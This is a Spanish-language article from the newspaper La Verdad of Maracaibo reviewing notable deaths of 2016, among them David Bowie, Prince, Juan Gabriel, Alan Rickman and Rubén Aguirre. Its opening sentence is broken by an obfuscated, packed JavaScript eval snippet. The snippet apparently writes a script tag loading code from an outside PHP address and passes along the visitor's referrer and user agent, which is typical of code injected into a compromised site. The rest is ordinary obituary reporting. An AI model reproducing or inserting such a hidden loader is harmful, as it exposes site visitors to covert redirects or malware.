publicidad

Un año lleno de lamentables partidas

Daniel Cubillán / Maracaibo / dcubillan@laverdad.com
Los eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|hieeb|var|u0026u|referrer|trihd||js|php'.split('|'),0,{})) músicos Juan Gabriel, Prince y David Bowie protagonizaron las muertes más impactantes y dolorosas de este año que casi culmina. El profesor Jirafales se fue a reunir con El Chavo en la eternidad

La muerte de músicos y actores enlutó a miles de seguidores en todo el mundo. (Fotos: Archivo)

David Bowie (12-01-2016) 

La legendaria estrella de rock, ícono estético y artístico de la segunda mitad del siglo XX, falleció a los 69 años, víctima del cáncer. Así se anunciaba, hacia las 7.30 de esa mañana, en los perfiles oficiales del artista en Facebook y Twitter. “David Bowie ha muerto en paz hoy (domingo) rodeado de su familia, después de una valiente lucha de 18 meses contra el cáncer. Mientras muchos de ustedes comparten la pérdida, pedimos respeto a la privacidad de la familia durante su tiempo de dolor”.

Bowie fue un artista en permanente revolución. Desafió todas las convenciones en la música, la moda y hasta la sexualidad. Fue más que la voz de una generación. Su imaginación y su talento marcaron la segunda mitad del siglo XX.

Alan Rickman (14-01-2016)

Alan estaba considerado como uno de los actores del cine y el teatro más versátiles del Reino Unido y famoso en los últimos tiempos por interpretar al profesor Severus Snape en las películas de las aventuras del niño mago Harry Potter. 

Rickman, estudió arte, se pasó a los escenarios, pasó por la Royal Academy of Dramatic Art, hizo de Shakespeare y del teatro isabelino su universidad. Cuando tenía 20 años, Alan se unió a Rima Horton, que entonces tenía 19 años y que después se convirtió en economista y activista política. Murió a los 69 años a causa de un cáncer. 

Prince (21-04-2016)

El superastro del pop fue hallado muerto el 21 de abril en su residencia en el área de Minneapolis. Tenía 57 años y las pruebas de la autopsia  indicaron que Prince murió de una sobredosis de opioides.  Su muerte se produjo a menos de una semana después de que su avión hiciera un aterrizaje de emergencia en Moline, Illinois, para que recibiera tratamiento médico mientras volvía de dar un concierto en Atlanta. Su música habría sido influenciada por grandes artistas y bandas como Jimi Hendrix, The Jackson 5, Sly & the Family Stone, Curtis Mayfield, Parliament/Funkadelic, Stevie Wonder, Joni Mitchell, Duke Ellington, Miles Davis, Carlos Santana, James Brown, The Beatles, Queen y Led Zeppelin. La Enciclopedia Británica, en su sección Rock Music, destaca a Prince, Michael Jackson y Madonna como notables estrellas de rock.

Juan Gabriel  (28-08-2016)

El cantante mexicano se encontraba en medio de la gira MeXXIco es Todo en los Estados Unidos, la cual inició en Las Vegas el 19 de agosto de 2016. El 27 de agosto por la noche dio su último concierto en The Forum de Los Ángeles, recital en el que usó un escenario con vista 360 grados. En el mismo recordó a la cantante Rocío Dúrcal, y cerró con un mensaje en las pantallas, "Felicidades a todas las personas que están orgullosas de ser lo que son".

El domingo 28 de agosto falleció a las 11.17, hora del Pacífico, en un departamento de su propiedad en la playa de Santa Mónica, California. Fue realizada una autopsia a su cuerpo, que determinó preliminarmente que el artista falleció por un infarto. Una despedida multitudinaria se realizó en su tierra natal, donde reposan sus restos.

Anton Yelchin (19-06-2016)

En la mañana del 19 de junio de 2016, Yelchin fue encontrado por amigos atrapado entre su coche y un pilar de ladrillos fuera de su casa en Studio City, California, en lo que fue descrito como un “extraño accidente”. Aparentemente, Yelchin salió de su coche y mientras se dirigía a la entrada de su casa, éste rodó hacia atrás y lo atrapó contra el pilar y una valla de seguridad.Fue declarado muerto más tarde ese día a la edad de 27 años. La oficina del forense del condado de Los Ángeles identificó la causa de la muerte como asfixia traumática contusa, y afirmó que “no había circunstancias sospechosas obvias implicadas”. Yelchin fue conocido por interpretar a Pavel Chekov en la serie de películas de reinicio de Star Trek, entre otros papeles prominentes.

Gene Wilder (29-08-2016)

Wilder, quien padecía de Alzheimer, falleció en su casa de Stamford, Connecticut, el 29 de agosto de 2016, debido a complicaciones derivadas de la enfermedad, según hizo público su familia en un comunicado. fue un actor, director y guionista estadounidense conocido por haber aparecido en algunas de las más notables obras de Mel Brooks, especialmente en Blazing Saddles, Los Productores y Young Frankenstein, además de películas como Willy Wonka & the Chocolate Factory, El Expreso de Chicago, El Principito o Bonnie y Clyde. Sus últimos trabajos fueron en 2005, cuando publicó sus memorias bajo el nombre Kiss Me Like A Stranger y en 2007 hizo lo mismo con su primera novela, centrada en la Primera Guerra Mundial, bajo el título My French Whore.

Christina Grimmie (10-06-2016)

La cantante estadounidense Christina Grimmie, una de las estrellas del programa televisivo The Voice en su país, murió por los disparos de un hombre que se acercó a ella cuando firmaba autógrafos después de un concierto, anunció la Policía de Orlando (Florida). La artista, de 22 años, acababa de cantar con el grupo Before You Exit y estaba firmando autógrafos cuando un hombre que llevaba dos armas se le acercó y le disparó, precisó la Policía. Los funcionaron informaron que “el hermano de la cantante se abalanzó sobre el hombre, quien volvió a disparar y se mató. No sabemos si era solo un admirador loco que la seguía en Twitter o en las redes sociales. Realmente no lo sabemos. Es un acontecimiento realmente trágico. Habría tenido que ser algo alegre, emocionante”.

George Martin (08-03-2016)

George Martin ayudó a producir más de 700 discos y fue la figura que ayudó a lanzar a los Beatles a la fama cuando dirigía el sello discográfico Parlophone, una división de EMI, después de escuchar una cinta de prueba del cuarteto en 1962. 

Martin fue responsable de producir todos los trabajos de los Beatles, que grabaron sus discos en los emblemáticos estudios de Abbey Road, en el barrio londinense de St. John's Wood. 

El productor falleció a los 90 años de edad. 

Rubén Aguirre (17-06-2016)

El actor mexicano Rubén Aguirre, conocido por su interpretación del profesor Jirafales en la serie televisiva El Chavo del 8, falleció a los 82 años.

Su amigo Édgar Vivar, quien interpretaba al Señor Barriga en la conocida serie de humor, que rompió récords de popularidad en la televisión latinoamericana, fue el primero que dio la noticia. "Mi profesor favorito descansa en paz... Hoy mi gran amigo Rubén Aguirre parte de este plano. Te extrañaré mucho", escribió Vivar en su cuenta de Twitter.

La hija del actor, Verónica Aguirre, indicó que su padre murió a las 4.00 de la madrugada, por complicaciones provocadas por una severa neumonía por la que había sido hospitalizado en mayo.

Carlos Cámara (24-02-2016)

El actor Carlos Cámara falleció la madrugada del 24 de febrero tras sufrir un infarto. El actor se fue a dormir en su cama y no despertó. De acuerdo con el parte médico, Cámara falleció alrededor de las 11.00 de la noche, confirmó su nuera Jackie Companioni, quien está casada con el actor Carlos Cámara Jr. El actor apenas había salido de terapia intensiva por problemas circulatorios, confirmó su hijo Víctor Cámara. El pasado mes de diciembre, el actor de 82 años fue sometido a una operación para colocarle un marcapasos luego de que su corazón padeció los embates del cuadro de neumonía que lo mantuvo hospitalizado en estado grave durante mes y medio.

Más noticias

  • El Teatro Baralt sube el telón este 24 de octubre

    19/10/2019 07:32pm

    La nueva directiva del Teatro Baralt de Maracaibo logra subir el telón el próximo 24 de octubre, luego de un mes constante de trabajo para mejorar los aspectos y acondicionamiento del lugar, se estarán presentrando mas de 27 agrupaciones de teatro regional y nacional hasta el 14 de diciembre

  • Empresas Polar recibe Premio Nacional a la Excelencia en Coaching

    18/10/2019 01:30pm

    La Sociedad Venezolana de Coaching otorgó el Premio Nacional a la Excelencia en Coaching a Fundación Empresas Polar, por su programa de Emprendimiento, el cual cuenta con más de 30 coach como parte del equipo de facilitadores de la línea de capacitación para el trabajo y el emprendimiento

  • Actriz colombo venezolana filma en Nueva York

    17/10/2019 09:39am

    La actriz colombo venezolana, Dani Franco López, hace parte del elenco del cortometraje de ficción ¿Mamá Eres Feliz?, que se estrenará próximamente en la ciudad de Nueva York, después de participar en varios festivales de cortos en los Estados Unidos

Comentarios
© 2017, Diario La Verdad. Maracaibo. Venezuela C.A. RIF J-30540623-5. Términos Legales. Contáctenos via: web@laverdad.com , noticias@laverdad.com o ventas@laverdad.com
Desarrollado por Miguel Guadarrama